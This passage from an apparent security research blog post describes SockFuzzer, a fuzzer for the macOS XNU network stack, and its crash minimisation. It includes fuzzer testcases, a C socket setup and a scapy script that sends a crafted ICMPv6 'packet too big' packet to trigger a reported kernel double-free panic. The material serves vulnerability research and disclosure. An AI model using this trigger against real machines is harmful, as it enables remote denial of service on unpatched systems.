    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10

    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_AUTHENTICATED

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  close {

    fd: FD_8

  }

}

commands {

  ioctl_real {

    siocsifflags {

      ifr_name: LO0

      flags: IFF_LINK1

    }

  }

}

commands {

  close {

    fd: FD_8

  }

}

data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_1

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131

        }

      }

    }

    associd: ASSOCID_CASE_0

  }

}

data_provider: ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the
AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_data field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as “listen” and “mbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer.

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {

  socket {

    domain: AF_INET6

    so_type: SOCK_RAW

    protocol: IPPROTO_IP

  }

}

commands {

  set_sock_opt {

    level: SOL_SOCKET

    name: SO_RCVBUF

    val: "\021\000\000\000"

  }

}

commands {

  set_sock_opt {

    level: IPPROTO_IPV6

    name: IP_FW_ZERO

    val: "\377\377\377\377"

  }

}

commands {

  ip_input {

    tcp6_packet {

      ip6_hdr {

        ip6_hdrctl {

          ip6_un1_flow: 0

          ip6_un1_plen: 0

          ip6_un1_nxt: IPPROTO_ICMPV6

          ip6_un1_hlim: 0

        }

        ip6_src: IN6_ADDR_LOOPBACK

        ip6_dst: IN6_ADDR_ANY

      }

      tcp_hdr {

        th_sport: PORT_2

        th_dport: PORT_1

        th_seq: SEQ_1

        th_ack: SEQ_1

        th_off: 0

        th_win: 0

        th_sum: 0

        th_urp: 0

        is_pure_syn: false

        is_pure_ack: false

      }

      data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }

  }

}

data_provider: ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>

#define __APPLE_USE_RFC_3542

#include <netinet/in.h>

#include <stdio.h>

#include <unistd.h>

int main() {

    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);

    if (fd < 0) {

        printf("failed\n");

        return 0;

    }

    int res;

    // This is not needed to cause a crash on macOS 10.14.6, but you can

    // try setting this option if you can't reproduce the issue.

    // int space = 1;

    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));

    // printf("res1: %d\n", res);

    int enable = 1;

    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));

    printf("res2: %d\n", res);

    // Keep the socket open without terminating.

    while (1) {

        sleep(5);

    }

    close(fd);

    return 0;

}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)

print(raw(outer).hex())

p = sr1(outer)

if p:

    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem more closely to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly is a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

❌
❌